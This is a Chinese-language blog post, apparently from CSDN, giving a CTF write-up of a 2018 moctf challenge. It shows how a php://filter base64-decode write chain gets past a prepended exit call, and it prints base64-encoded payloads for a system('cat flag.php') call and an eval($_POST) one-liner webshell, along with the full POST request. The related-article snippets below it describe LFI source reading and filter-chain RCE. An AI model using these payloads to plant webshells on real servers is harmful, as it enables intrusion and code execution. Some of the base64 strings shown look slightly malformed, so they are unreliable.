php filter base64,php://filter的妙用

最新推荐文章于 2023-04-12 13:08:43 发布
最新推荐文章于 2023-04-12 13:08:43 发布
阅读量787 收藏
点赞数
文章标签: php filter base64

php://filter是PHP语言中特有的协议流,作用是作为一个“中间流”来处理其他流。比如,我们可以用如下一行代码将POST内容转换成base64编码并输出

以下是2018年moctf一道 死亡退出的题

查看源码:<?php exit;?>写在了最前面;说明当代码执行到这里会使代码直接退出,不会执行后续代码。所以我们要绕过这里!

先来分析下后续代码: 先给$c用post方法传递一个参数 此处的@是屏蔽错误提示的意思,后 file_put_contents

是把数据写入文件中。 这里绕过<?php exit ?>可以通过使用协议流的方法使用base64编码,绕过。

既:file=php://filter/write=convert.base64-decode/resource=tmp.php

接下来构造传入的字符串c:

(看了好多博客,发现他们给c传入的值都是<?php system('cat flag.php'); ?>)之所以都传他,是因为 题目说了flag在flag.php里面,所以写马。将<?php system('cat flag.php'); ?>

转化为base64编码如下:

c=aPD9waHAgc3lzdGVtKCdjYXQ1gZmxhZy5waHAnKTsgPz4=

而我自己写的时候,用的是构造了一句话木马,传入。

(目前还不清楚为啥都可以,难道是php文本的都可以?)

转为base64编码传入:

c=aPD9waHAgQGV2YWwoJF9QT1NUWydjJ10pOz8+

因为phpexit一共7个字符,因为base64算法解码时是4个byte一组,所以给他增加1个“a”一共8个字符。这样,"phpexita"被正常解码,而后面我们传入的webshell的base64内容也被正常解码。

所以用post传入数据 :c=aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=&file=php://filter/write=convert.base64-decode/resource=tmp.php

后抓包运行即可!!!!!

丹大个儿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浅谈php://filter妙用
01-02
php://filterPHP中独有的协议,利用这个协议可以创造很多“妙用”,本文说几个有意思的点,剩下的大家自己下去体会。本来本文的思路我上半年就准备拿来做XDCTF2016的题目的,没想到被三个白帽的一题抢先用了,我也...
php://filter 的使用
hhh
09-03 2万+
今天做bugku的基础题遇见的……很神奇,真心涨姿势(好吧其实我现在每做一道题都是涨知识) 题目:flag在index里 链接:呼哈哈 题解: 可以看到题目打开的界面里 注意这里:?file=show.php;可以联想到文件包含漏洞,然后我们就可以用php://filter协议来查看源文件内容; 构造:php://filter/read=convert.base64-encode/...
php://filter利用条件,浅谈php://filter技巧
weixin_33744799的博客
03-28 1117
php://filterphp://filter可以作为一个中间流来处理其他流,具有四个参数:名称描述备注resource=指定了你要筛选过滤的数据流必选read=可以设定一个或多个过滤器名称,以管道符(|)分隔。可选write=可以设定一个或多个过滤器名称,以管道符(|)分隔。可选任何没有以 read= 或 write= 作前缀的筛选器列表会视情况应用于读或写链。巧用编码与解码$content ...
php://filter
2202_75317918的博客
04-12 2620
php://filter
记录php://filter妙用
小菜猴子_x
03-04 242
记录php://filter妙用
Sql注入点攻击
m0_58713554的博客
12-22 1084
访问WebServ2003服务器场景,"/"->" Display Uploaded's File Content",分析该页面源程序,找到提交的变量名,并将该变量名作为Flag(形式:name=“变量名”)提交; 访问后利用万能用户名进入场景 进入后查看网页源代码查看变量名 Flag:name="filename" 对该任务第一题页面注入点进行渗透测试,通过php://filter协议使当前页面以Base64编码方式回显WebServ2003服务器场景访问日志文件:AppServ
cakephp-url-filter:CakePHP 网址过滤
07-18
$base_url = array('controller' => 'maps', 'action' => 'view_map'); echo $this->Form->create('Map',array('url'=>$base_url)); echo $this->Form->input('street_name',array('div'=>FALSE, 'type'=>'text'...
google api php client
10-24
$optParams = array('filter' => 'free-ebooks'); $results = $service->volumes->listVolumes('Henry David Thoreau', $optParams); foreach ($results as $item) { echo $item['volumeInfo']['title'], "<br /> ...
ldap:简化LDAP搜索的小型库
04-01
暴跌使用安装: composer require plunging-chode/ldap进行LDAP查询或验证用户的凭证: use PlungingChode \ Ldap \ Ldap ;use PlungingChode \ Ldap \ Filter ;$ ldap = new Ldap ( // Supply a host and port '...
php.ini-development
05-08
[PHP] ;;;;;;;;;;;;;;;;;;; ; About php.ini ; ;;;;;;;;;;;;;;;;;;; ; PHP's initialization file, generally called php.ini, is responsible for ; configuring many of the aspects of PHP's behavior. ; PHP...
PHP内置过滤器FILTER使用实例
10-25
主要介绍了PHP内置过滤器FILTER使用实例,列举了验证功能和纠错功能的代码例子来讲解如何使用FILTER,需要的朋友可以参考下
php filter base64,通过php://filter/read=convert.base64-encode/resource= 利用LFI来查看源码
weixin_32446485的博客
03-11 1376
PHP LFI读php文件源码以及直接post webshell2013-08-17 15:25:15|分类: 安全 |字号订阅最近在忙defcon的题目集训其中有一套题目里有个老外写的writeup中提到了LFI的另一种小技巧原文请参考http://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/PS:该...
谈一谈php://filter妙用
beyond__devil的博客
10-19 1万+
原文地址: https://www.leavesongs.com/PENETRATION/php-filter-magic.html 这个可能是一个大牛,大家可以看看博客去,我没看过。。。 php://filterPHP中独有的协议,利用这个协议可以创造很多“妙用”,本文说几个有意思的点,剩下的大家自己下去体会。本来本文的思路我上半年就准备拿来做XDCTF2016的题目的,
利用filter过滤器的编码组合构造RCE
ph0ebus的博客
02-14 423
紧接上篇,记录一下如何实现利用 PHP Base64 Filter 宽松的解析,通过 iconv filter 等编码组合构造出特定的 PHP 代码进而完成无需临时文件的 RCE。
通过php://filter/read=convert.base64-encode/resource= 利用LFI来查看源码
热门推荐
Taowood的博客
07-25 3万+
PHP LFI读php文件源码以及直接post webshell 假设如下一个场景 (1) http://vulnerable/fileincl/example1.php?page=intro.php(该php文件包含LFI漏洞) (2) 但是你没有地方可以upload你的webshell代码 (3) LFI只能读取到非php文件的源码(因为无法解析执行 只能被爆菊花) (4) 如果你能...
php://filter协议在任意文件读取漏洞中的利用(学习总结)
L2329794714的博客
11-12 3046
一、php://协议 官网解释为: php://—AccessingvariousI/O streams PHP provides a number of miscellaneous I/O streams that allow access to PHP's own input and output streams, the standard input, output and error file descriptors, in-memory and disk-backe...
CTF Web php://filter文件内容包含漏洞
Drongin的博客
12-09 1万+
MCTF Web400 http://web.mirage-ctf.cn/web/8a43a97ced320c18ec254577a91a0d92/ 点击后发现PATH=flag这个很熟悉,有经验的老司机第一眼就会看出这里可能有php的文件包含漏洞,自己也百度了一下,通过这个漏洞可以看到源代码,加上php://filter/read=convert.base64-encode/resou
php://filter(文件包含漏洞利用)
MIGENGKING的博客
10-12 8060
“网址+/index.php?page=php://filter/convert.base64-encode/resource=index.php“ 例如: http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php 首先这是一个file关键字的ge...
php://filter/read=convert.base64-encode/resource
最新发布
08-18
php://filter/read=convert.base64-encode/resource是一种PHP的协议,可以用来读取文件的源码,并将其以base64编码的形式输出。这个协议的格式是php://filter/read=convert.base64-encode/resource=[文件路径]。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值